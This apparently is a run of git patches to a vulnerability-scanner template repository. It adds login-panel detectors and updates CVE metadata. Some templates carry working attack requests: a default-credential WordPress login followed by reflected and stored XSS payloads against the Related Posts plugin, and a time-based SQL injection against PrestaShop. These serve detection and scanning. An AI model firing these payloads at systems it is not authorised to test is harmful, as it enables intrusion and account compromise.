info: name: Symfony FOSJsRoutingBundle author: DhiyaneshDk - severity: low + severity: medium reference: - https://packagist.org/packages/friendsofsymfony/jsrouting-bundle metadata: From 0a693d3ee778b1d0f9cbb8a0213686c7f2b3eeb0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 26 Nov 2022 16:46:29 +0000 Subject: [PATCH 0686/1415] Auto Generated New Template Addition List [Sat Nov 26 16:46:29 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9d7e6109f6..7236e453b0 100644 --- a/.new-additions +++ b/.new-additions @@ -25,3 +25,4 @@ technologies/oracle-httpserver12c.yaml technologies/payara-micro-server-detect.yaml token-spray/api-giphy.yaml vulnerabilities/other/inspur-clusterengine-rce.yaml +vulnerabilities/wordpress/wptouch-xss.yaml From 060f13b24abd7d705aa3d899f21fc986ed1d12e2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 26 Nov 2022 16:52:14 +0000 Subject: [PATCH 0687/1415] Auto Generated CVE annotations [Sat Nov 26 16:52:14 UTC 2022] :robot: --- cves/2012/CVE-2012-0394.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2012/CVE-2012-0394.yaml b/cves/2012/CVE-2012-0394.yaml index 297861b3f9..fe942ac07a 100644 --- a/cves/2012/CVE-2012-0394.yaml +++ b/cves/2012/CVE-2012-0394.yaml @@ -10,10 +10,11 @@ info: - https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/ - https://www.exploit-db.com/exploits/31434 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394 + - http://www.exploit-db.com/exploits/18329 metadata: - verified: true shodan-query: html:"Struts Problem Report" - tags: cve,cve2012,apache,struts,ognl,injection + verified: "true" + tags: ognl,injection,edb,cve,cve2012,apache,struts variables: first: "{{rand_int(1000, 9999)}}" From c7f3116b1f39f8fbba9a2d408a43dbf954865e9d Mon Sep 17 00:00:00 2001 From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com> Date: Sun, 27 Nov 2022 00:16:19 +0530 Subject: [PATCH 0688/1415] Create cudatel-panel.yaml --- exposed-panels/cudatel-panel.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposed-panels/cudatel-panel.yaml diff --git a/exposed-panels/cudatel-panel.yaml b/exposed-panels/cudatel-panel.yaml new file mode 100644 index 0000000000..4da54349cb --- /dev/null +++ b/exposed-panels/cudatel-panel.yaml @@ -0,0 +1,29 @@ +id: cudatel-panel + +info: + name: CudaTel - Login Panel Detect + author: arafatansari + severity: info + metadata: + shodan-query: title:CudaTel 200 + verified: true + tags: cudatel,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'CudaTel Communications Server' + - 'Service Login' + - 'Username' + - 'Password' + condition: or From 708ba01fca2cf3d5b10493f690d34659d14e1058 Mon Sep 17 00:00:00 2001 From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com> Date: Sun, 27 Nov 2022 00:45:02 +0530 Subject: [PATCH 0689/1415] Create asus-router-login.yaml --- exposed-panels/asus-router-login.yaml | 29 +++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposed-panels/asus-router-login.yaml diff --git a/exposed-panels/asus-router-login.yaml b/exposed-panels/asus-router-login.yaml new file mode 100644 index 0000000000..bc213ffab8 --- /dev/null +++ b/exposed-panels/asus-router-login.yaml @@ -0,0 +1,29 @@ +id: asus-router-login + +info: + name: Asus Router - Login Panel + author: arafatansari + severity: info + metadata: + shodan-query: 'HTTP/1.0 200 OK Server: httpd/2.0 port:8080' + verified: true + tags: asus,router,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/Main_Login.asp" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'ASUS Login' + - 'Sign in with your ASUS router account' + - 'Username' + - 'Password' + condition: or From 92212e96ddf403af3212c063ee4c12269d240e26 Mon Sep 17 00:00:00 2001 From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com> Date: Sun, 27 Nov 2022 00:54:57 +0530 Subject: [PATCH 0690/1415] Create zyxel-router-login.yaml --- exposed-panels/zyxel-router-login.yaml | 28 ++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposed-panels/zyxel-router-login.yaml diff --git a/exposed-panels/zyxel-router-login.yaml b/exposed-panels/zyxel-router-login.yaml new file mode 100644 index 0000000000..0675b121c9 --- /dev/null +++ b/exposed-panels/zyxel-router-login.yaml @@ -0,0 +1,28 @@ +id: zyxel-router-login + +info: + name: ZyXel Router - Login Panel + author: arafatansari + severity: info + metadata: + shodan-query: 'title:"Web-Based Configurator"' + verified: true + tags: zyxel,router,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + - "{{BaseURL}}/" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'Welcome to the Web-Based Configurator' + - 'zyxel' + condition: and From e93a5a87f6acd5e4c856586fc29e9de3ec01e0bd Mon Sep 17 00:00:00 2001 From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com> Date: Sun, 27 Nov 2022 12:41:16 +0530 Subject: [PATCH 0691/1415] Create wp-related-post-xss --- vulnerabilities/wordpress/wp-related-post-xss | 43 +++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-related-post-xss diff --git a/vulnerabilities/wordpress/wp-related-post-xss b/vulnerabilities/wordpress/wp-related-post-xss new file mode 100644 index 0000000000..e4be204213 --- /dev/null +++ b/vulnerabilities/wordpress/wp-related-post-xss @@ -0,0 +1,43 @@ +id: wp-related-post-xss + +info: + name: WordPress Related Posts <= 2.1.1 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + WordPress Related Posts plugin before 2.1.1 contains an Reflected XSS via rp4wp_parent + reference: + - https://huntr.dev/bounties/7c9bd2d2-2a6f-420c-a45e-716600cf810e/ + tags: wordpress,xss,plugin,wpscan + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log=admin&pwd=admin123&wp-submit=Log+In&redirect_to={{Host}}%2Fwp-admin%2F&testcookie=1 + + - | + GET /wp-admin/admin.php?page=rp4wp_link_related&rp4wp_parent=156x%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 601d8008c93733fdd62c934f65a30581228ce52b Mon Sep 17 00:00:00 2001 From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com> Date: Sun, 27 Nov 2022 13:14:09 +0530 Subject: [PATCH 0692/1415] Create CVE-2022-3506.yaml --- cves/2022/CVE-2022-3506.yaml | 46 ++++++++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 cves/2022/CVE-2022-3506.yaml diff --git a/cves/2022/CVE-2022-3506.yaml b/cves/2022/CVE-2022-3506.yaml new file mode 100644 index 0000000000..e4ea8dce72 --- /dev/null +++ b/cves/2022/CVE-2022-3506.yaml @@ -0,0 +1,46 @@ +id: CVE-2022-3506 + +info: + name: WordPress Related Posts <= 2.1.2 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + The Related Posts for WordPress plugin is vulnerable to stored XSS, specifically in the rp4wp[heading_text] parameter because the user input is not properly sanitized, allowing the insertion of JavaScript code that can exploit the vulnerability. + reference: + - https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828/ + tags: wordpress,xss,plugin,wpscan + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log=admin&pwd=admin123&wp-submit=Log+In&redirect_to={{Host}}%2Fwp-admin%2F&testcookie=1 + + - | + POST /wp-admin/options.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_af799bb8d843135ea8438550f9a8b4e6=admin%7C1669705235%7CIGJKEmOLs5jCz06lVDPuolfmVDQbZC0wXGuVBewRhuD%7C7d62cc61df0f73b280f28510a05879a270392b50a12068fd68c9e801853a0e10; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_af799bb8d843135ea8438550f9a8b4e6=admin%7C1669705235%7CIGJKEmOLs5jCz06lVDPuolfmVDQbZC0wXGuVBewRhuD%7Cb8be6e1450ea194a89ffd327ad1eabf1afbf5a57f9d9f462673f170bc05105f4; wp-settings-time-1=1669534288 + + option_page=rp4wp&action=update&_wpnonce=c0d0936d93&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28%2FXSS%2F%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D + + - | + GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'autofocus onfocus=alert(/XSS/)>' + + - type: status + status: + - 200 From 43fac1eefce1b1afaea3f901e1ad9a98040880a1 Mon Sep 17 00:00:00 2001 From: Hardik Solanki <49536512+HardikSolanki96@users.noreply.github.com> Date: Sun, 27 Nov 2022 14:42:02 +0000 Subject: [PATCH 0693/1415] Create vodafone-vox-ui.yaml --- exposed-panels/vodafone-vox-ui.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 exposed-panels/vodafone-vox-ui.yaml diff --git a/exposed-panels/vodafone-vox-ui.yaml b/exposed-panels/vodafone-vox-ui.yaml new file mode 100644 index 0000000000..5359a2de55 --- /dev/null +++ b/exposed-panels/vodafone-vox-ui.yaml @@ -0,0 +1,27 @@ +id: vodafone-vox-ui + +info: + name: Vodafone Vox UI + author: Hardik-Solanki + severity: info + metadata: + verified: true + shodan-query: title:"Vodafone Vox UI" + tags: panel,vodafone + +requests: + - method: GET + path: + - '{{BaseURL}}/login.stm' + + matchers-condition: and + matchers: + - type: word + words: + - "Vodafone Vox UI" + - "Welcome to your EasyBox" + condition: and + + - type: status + status: + - 200 From 8713c7e55aa535b46aff5028b68be0efd7e5ce0c Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sun, 27 Nov 2022 18:16:59 +0100 Subject: [PATCH 0694/1415] Add files via upload --- exposed-panels/dradis-pro-panel.yaml | 32 ++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 exposed-panels/dradis-pro-panel.yaml diff --git a/exposed-panels/dradis-pro-panel.yaml b/exposed-panels/dradis-pro-panel.yaml new file mode 100644 index 0000000000..ec63583534 --- /dev/null +++ b/exposed-panels/dradis-pro-panel.yaml @@ -0,0 +1,32 @@ +id: dradis-pro-panel + +info: + name: Dradis Professional Edition Panel + author: righettod + severity: info + reference: + - https://dradisframework.com/ce/ + - https://dradisframework.com/support/guides/rest_api/ + metadata: + verified: true + shodan-query: title:"Login | Dradis Professional Edition" + tags: panel,dradis + +requests: + - method: GET + path: + - "{{BaseURL}}/pro/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Dradis Professional Edition" + - "Dradis requires JavaScript" + - "Requires authentication" + condition: or + + - type: status + status: + - 200 From 4a4a8e9e589f36ba76d001c2b4f8d72b0215e0ba Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sun, 27 Nov 2022 18:21:08 +0100 Subject: [PATCH 0695/1415] Remove useless content --- exposed-panels/dradis-pro-panel.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/exposed-panels/dradis-pro-panel.yaml b/exposed-panels/dradis-pro-panel.yaml index ec63583534..32f6e5c6c0 100644 --- a/exposed-panels/dradis-pro-panel.yaml +++ b/exposed-panels/dradis-pro-panel.yaml @@ -6,7 +6,6 @@ info: severity: info reference: - https://dradisframework.com/ce/ - - https://dradisframework.com/support/guides/rest_api/ metadata: verified: true shodan-query: title:"Login | Dradis Professional Edition" @@ -24,7 +23,6 @@ requests: words: - "Dradis Professional Edition" - "Dradis requires JavaScript" - - "Requires authentication" condition: or - type: status From 050e0c0f73c8f41a6e771a7c7cc4c60ffcbebc0b Mon Sep 17 00:00:00 2001 From: wc-jung <107822925+wc-jung@users.noreply.github.com> Date: Mon, 28 Nov 2022 09:42:51 +0900 Subject: [PATCH 0696/1415] Update CVE-2016-10033.yaml --- cves/2016/CVE-2016-10033.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2016/CVE-2016-10033.yaml b/cves/2016/CVE-2016-10033.yaml index 6f283957ea..c902fc75a9 100644 --- a/cves/2016/CVE-2016-10033.yaml +++ b/cves/2016/CVE-2016-10033.yaml @@ -1,7 +1,7 @@ id: CVE-2016-10033 info: - name: WordPress PHPMailer < 5.2.18 Remote Code Execution + name: WordPress PHPMailer < 5.2.18 - Remote Code Execution author: princechaddha severity: critical description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport. From b4d356884e7727e5e40de561d29c983eae2d5e99 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 28 Nov 2022 09:56:46 +0530 Subject: [PATCH 0697/1415] Update dradis-pro-panel.yaml --- exposed-panels/dradis-pro-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/dradis-pro-panel.yaml b/exposed-panels/dradis-pro-panel.yaml index 32f6e5c6c0..185789f7b2 100644 --- a/exposed-panels/dradis-pro-panel.yaml +++ b/exposed-panels/dradis-pro-panel.yaml @@ -8,7 +8,7 @@ info: - https://dradisframework.com/ce/ metadata: verified: true - shodan-query: title:"Login | Dradis Professional Edition" + shodan-query: title:"Dradis Professional Edition" tags: panel,dradis requests: @@ -23,7 +23,7 @@ requests: words: - "Dradis Professional Edition" - "Dradis requires JavaScript" - condition: or + condition: and - type: status status: From 2a7c3f1f56895f55ca969957b86c116aa3d682a4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 28 Nov 2022 13:19:50 +0530 Subject: [PATCH 0699/1415] lint fix --- cves/2022/CVE-2022-3506.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-3506.yaml b/cves/2022/CVE-2022-3506.yaml index e4ea8dce72..f7ee972534 100644 --- a/cves/2022/CVE-2022-3506.yaml +++ b/cves/2022/CVE-2022-3506.yaml @@ -11,12 +11,12 @@ info: tags: wordpress,xss,plugin,wpscan requests: - - raw: + - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - + log=admin&pwd=admin123&wp-submit=Log+In&redirect_to={{Host}}%2Fwp-admin%2F&testcookie=1 - | @@ -24,7 +24,7 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_af799bb8d843135ea8438550f9a8b4e6=admin%7C1669705235%7CIGJKEmOLs5jCz06lVDPuolfmVDQbZC0wXGuVBewRhuD%7C7d62cc61df0f73b280f28510a05879a270392b50a12068fd68c9e801853a0e10; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_af799bb8d843135ea8438550f9a8b4e6=admin%7C1669705235%7CIGJKEmOLs5jCz06lVDPuolfmVDQbZC0wXGuVBewRhuD%7Cb8be6e1450ea194a89ffd327ad1eabf1afbf5a57f9d9f462673f170bc05105f4; wp-settings-time-1=1669534288 - + option_page=rp4wp&action=update&_wpnonce=c0d0936d93&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28%2FXSS%2F%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D - | From d80211fcee046976443c4bee8006a4a9ea3f2a38 Mon Sep 17 00:00:00 2001 From: onaeonae2 <86819037+onaeonae2@users.noreply.github.com> Date: Mon, 28 Nov 2022 16:54:38 +0900 Subject: [PATCH 0700/1415] Update CVE-2022-25323.yaml --- cves/2022/CVE-2022-25323.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-25323.yaml b/cves/2022/CVE-2022-25323.yaml index c5d5548842..cc33dc27eb 100644 --- a/cves/2022/CVE-2022-25323.yaml +++ b/cves/2022/CVE-2022-25323.yaml @@ -1,7 +1,7 @@ id: CVE-2022-25323 info: - name: ZEROF Web Server 2.0 Cross-Site Scripting + name: ZEROF Web Server 2.0 - Cross-Site Scripting author: pikpikcu severity: medium description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting. From 9f60094d840f8267c7a99caf129d294030a1d49f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 28 Nov 2022 08:04:24 +0000 Subject: [PATCH 0701/1415] Auto Generated CVE annotations [Mon Nov 28 08:04:24 UTC 2022] :robot: --- cves/2021/CVE-2021-43421.yaml | 6 +++++- vulnerabilities/wordpress/wptouch-xss.yaml | 2 +- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-43421.yaml b/cves/2021/CVE-2021-43421.yaml index 839d5389ba..16cbe81ea0 100644 --- a/cves/2021/CVE-2021-43421.yaml +++ b/cves/2021/CVE-2021-43421.yaml @@ -9,10 +9,14 @@ info: reference: - https://github.com/Studio-42/elFinder/issues/3429 - https://nvd.nist.gov/vuln/detail/CVE-2021-43421 + - https://twitter.com/infosec_90/status/1455180286354919425 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2021-43421 + cwe-id: CWE-434 metadata: - verified: true + verified: "true" tags: cve,cve2021,elfinder,upload,rce,intrusive requests: diff --git a/vulnerabilities/wordpress/wptouch-xss.yaml b/vulnerabilities/wordpress/wptouch-xss.yaml index b864f30c74..b3abb2fe8f 100644 --- a/vulnerabilities/wordpress/wptouch-xss.yaml +++ b/vulnerabilities/wordpress/wptouch-xss.yaml @@ -9,7 +9,7 @@ info: reference: - https://wpscan.com/vulnerability/7dbd8348-9c5d-4d62-a0f4-2b7c2b7e58e4 - https://wordpress.org/plugins/wptouch/advanced/ - tags: wp-plugin,wp,wordpress,xss,authenticated,wptouch + tags: wp-plugin,wp,wordpress,xss,authenticated,wptouch,wpscan requests: - raw: From 8b6f7b540f49809499f46fcedf5aafa768fc6833 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 28 Nov 2022 21:41:48 +0530 Subject: [PATCH 0703/1415] Update CVE-2021-3110.yaml --- cves/2021/CVE-2021-3110.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-3110.yaml b/cves/2021/CVE-2021-3110.yaml index 5d5be392ff..67fb84dd1e 100644 --- a/cves/2021/CVE-2021-3110.yaml +++ b/cves/2021/CVE-2021-3110.yaml @@ -15,9 +15,11 @@ info: tags: cve,cve2021,sqli,prestshop requests: - - method: GET - path: - - "{{BaseURL}}/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt)" + - raw: + - | + @timeout: 20s + GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1 + Host: {{Hostname}} matchers: - type: dsl From ccf517dc6ff3a3fbb8514711ed080ca2adfc0d46 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 28 Nov 2022 16:38:14 +0000 Subject: [PATCH 0704/1415] Auto Generated New Template Addition List [Mon Nov 28 16:38:14 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7236e453b0..a717b3f805 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ cves/2012/CVE-2012-0394.yaml +cves/2021/CVE-2021-3110.yaml cves/2021/CVE-2021-43421.yaml cves/2022/CVE-2022-1883.yaml cves/2022/CVE-2022-1916.yaml From e0271e045aa23f4ca8aec047b8996d2cb52b4f38 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 28 Nov 2022 16:53:16 +0000 Subject: [PATCH 0705/1415] Auto Generated CVE annotations [Mon Nov 28 16:53:16 UTC 2022] :robot: --- cves/2021/CVE-2021-3110.yaml | 32 ++++++++++++++++++-------------- 1 file changed, 18 insertions(+), 14 deletions(-) diff --git a/cves/2021/CVE-2021-3110.yaml b/cves/2021/CVE-2021-3110.yaml index 67fb84dd1e..47624900ea 100644 --- a/cves/2021/CVE-2021-3110.yaml +++ b/cves/2021/CVE-2021-3110.yaml @@ -1,19 +1,23 @@ id: CVE-2021-3110 -info: - name: PrestaShop 1.7.7.0 SQL Injection - author: Jaimin Gondaliya - severity: critical - description: | - The store system in PrestaShop 1.7.7.0 allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-3110 - - https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e - - https://www.exploit-db.com/exploits/49410 - metadata: - verified: true - tags: cve,cve2021,sqli,prestshop - +info: + name: PrestaShop 1.7.7.0 SQL Injection + author: Jaimin Gondaliya + severity: critical + description: | + The store system in PrestaShop 1.7.7.0 allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-3110 + - https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e + - https://www.exploit-db.com/exploits/49410 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-3110 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2021,sqli,prestshop,edb requests: - raw: - | From b995ac164e5c68e1d7ea54ad9e5097251a9497e6 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 28 Nov 2022 19:48:15 +0100 Subject: [PATCH 0706/1415] Add files via upload --- exposed-panels/riseup-panel.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 exposed-panels/riseup-panel.yaml diff --git a/exposed-panels/riseup-panel.yaml b/exposed-panels/riseup-panel.yaml new file mode 100644 index 0000000000..6603cee57c --- /dev/null +++ b/exposed-panels/riseup-panel.yaml @@ -0,0 +1,30 @@ +id: riseup-panel + +info: + name: Rise Up Panel + author: righettod + severity: info + reference: + - https://www.riseup.ai/en/ + metadata: + verified: true + tags: panel,riseup + +requests: + - method: GET + path: + - "{{BaseURL}}/Account/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "cfg.envRiseUp" + - "imgresize.riseup.ai" + - "content.riseup.ai" + condition: and + + - type: status + status: + - 200 From ce9120dbea1ce42a1dc6b0686ddbfe0da4ba4874 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 28 Nov 2022 20:02:35 +0100 Subject: [PATCH 0707/1415] Add files via upload --- .../locklizard-webviewer-panel.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 exposed-panels/locklizard-webviewer-panel.yaml diff --git a/exposed-panels/locklizard-webviewer-panel.yaml b/exposed-panels/locklizard-webviewer-panel.yaml new file mode 100644 index 0000000000..b8ce840b24 --- /dev/null +++ b/exposed-panels/locklizard-webviewer-panel.yaml @@ -0,0 +1,31 @@ +id: locklizard-webviewer-panel + +info: + name: Locklizard Web Viewer Panel + author: righettod + severity: info + reference: + - https://www.locklizard.com/pdf_security_webviewer/ + metadata: + verified: true + shodan-query: html:"Locklizard Web Viewer" + tags: panel,locklizard,webviewer + +requests: + - method: GET + path: + - "{{BaseURL}}/webviewer/index.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'content="Locklizard Web Viewer"' + - 'content="LockLizard"' + - "Locklizard Web Viewer" + condition: and + + - type: status + status: + - 200 From 8fdf2cd8b36d86634d3547e68ab88855c448068c Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 29 Nov 2022 00:11:11 -0500 Subject: [PATCH 0708/1415] Update CVE-2021-35587.yaml added shodan-query --- cves/2021/CVE-2021-35587.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-35587.yaml b/cves/2021/CVE-2021-35587.yaml index 7f4cbd0ed0..4ea3eb5802 100644 --- a/cves/2021/CVE-2021-35587.yaml +++ b/cves/2021/CVE-2021-35587.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-502 metadata: fofa-query: body="/oam/pages/css/login_page.css" + shodan-query: http.title:"Oracle Access Management" tags: cve,cve2021,oam,rce,java,unauth,oracle requests: From 5bdb492bace6177b5d621cd845ff1784df11f681 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 29 Nov 2022 00:16:28 -0500 Subject: [PATCH 0709/1415] Update comtrend-password-exposure.yaml Corrected typo -> match id with filename. --- vulnerabilities/other/comtrend-password-exposure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/comtrend-password-exposure.yaml b/vulnerabilities/other/comtrend-password-exposure.yaml index bd9677b109..f9decab034 100644 --- a/vulnerabilities/other/comtrend-password-exposure.yaml +++ b/vulnerabilities/other/comtrend-password-exposure.yaml @@ -1,4 +1,4 @@ -id: comtrend-passsword-exposure +id: comtrend-password-exposure info: name: Comtrend ADSL - Remote Code Execution From 3458bcabd99b57e759f069271af3d2068732e64b Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 29 Nov 2022 00:22:34 -0500 Subject: [PATCH 0710/1415] Rename icewarp-openredirects.yaml to icewarp-open-redirect.yaml id + filename matching --- .../{icewarp-openredirects.yaml => icewarp-open-redirect.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename vulnerabilities/other/{icewarp-openredirects.yaml => icewarp-open-redirect.yaml} (100%) diff --git a/vulnerabilities/other/icewarp-openredirects.yaml b/vulnerabilities/other/icewarp-open-redirect.yaml similarity index 100% rename from vulnerabilities/other/icewarp-openredirects.yaml rename to vulnerabilities/other/icewarp-open-redirect.yaml From 9c2c3d964b93417f65b6b6baf84364df46aa1b44 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 29 Nov 2022 00:24:14 -0500 Subject: [PATCH 0711/1415] Update nuuo-nvrmini2-rce.yaml filename + id matching --- vulnerabilities/other/nuuo-nvrmini2-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/nuuo-nvrmini2-rce.yaml b/vulnerabilities/other/nuuo-nvrmini2-rce.yaml index e0f40d5061..b15a0a3a4f 100644 --- a/vulnerabilities/other/nuuo-nvrmini2-rce.yaml +++ b/vulnerabilities/other/nuuo-nvrmini2-rce.yaml @@ -1,4 +1,4 @@ -id: nuuo-nvrmini2-upgradehandlephp-rce +id: nuuo-nvrmini2-rce info: name: NUUO NVRmini 2 3.0.8 - Remote Code Execution From 8b4e280c02573cc782cf89f33d011103a91b1941 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 29 Nov 2022 00:28:22 -0500 Subject: [PATCH 0712/1415] Rename tikiwiki-json-rpc.yaml to kiwitcms-json-rpc.yaml - Incorrect file name (tikiwiki vs Kiwi TCMS). - Matching filename + id. --- .../other/{tikiwiki-json-rpc.yaml => kiwitcms-json-rpc.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename vulnerabilities/other/{tikiwiki-json-rpc.yaml => kiwitcms-json-rpc.yaml} (97%) 